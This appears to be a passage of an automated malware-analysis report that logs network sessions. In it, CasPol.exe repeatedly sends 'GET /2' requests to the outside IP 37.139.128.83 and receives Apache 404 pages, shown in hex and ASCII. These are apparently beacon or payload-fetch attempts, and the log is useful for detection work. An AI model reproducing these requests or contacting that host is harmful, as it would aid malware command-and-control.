                                                    Date: Mon, 20 Mar 2023 12:21:49 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:49.794631958 CET344INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:49.794694901 CET344INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:49.794749975 CET345INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:49.794809103 CET345INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    31192.168.11.204984737.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:59.821090937 CET400OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:59.854135990 CET400INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:59 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:59.854221106 CET401INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:59.854341984 CET401INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:59.854352951 CET402INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:59.854388952 CET402INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    32192.168.11.204985137.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:22:09.881185055 CET418OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:09.910502911 CET419INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:09 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:09.910592079 CET419INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:09.910655022 CET419INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:09.910712957 CET420INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:09.910772085 CET420INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    33192.168.11.204985237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:22:19.941399097 CET421OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:19.964976072 CET421INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:19 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:19.965059042 CET422INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:19.965223074 CET422INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:19.965310097 CET423INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:19.965394974 CET423INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    34192.168.11.204985637.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:22:30.002024889 CET441OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:30.059920073 CET442INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:30.073276997 CET442INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:30.073358059 CET443INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:30.073452950 CET443INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:30.073503971 CET443INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    35192.168.11.204985837.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:22:40.109833956 CET462OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:40.143893003 CET463INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:40 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:40.143981934 CET463INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:22:40.144046068 CET464INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:22:40.144110918 CET464INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:22:40.144188881 CET464INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    36192.168.11.204985937.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:22:51.183643103 CET465OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:22:51.264005899 CET466INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:22:51 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:22:51.264113903 CET466INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
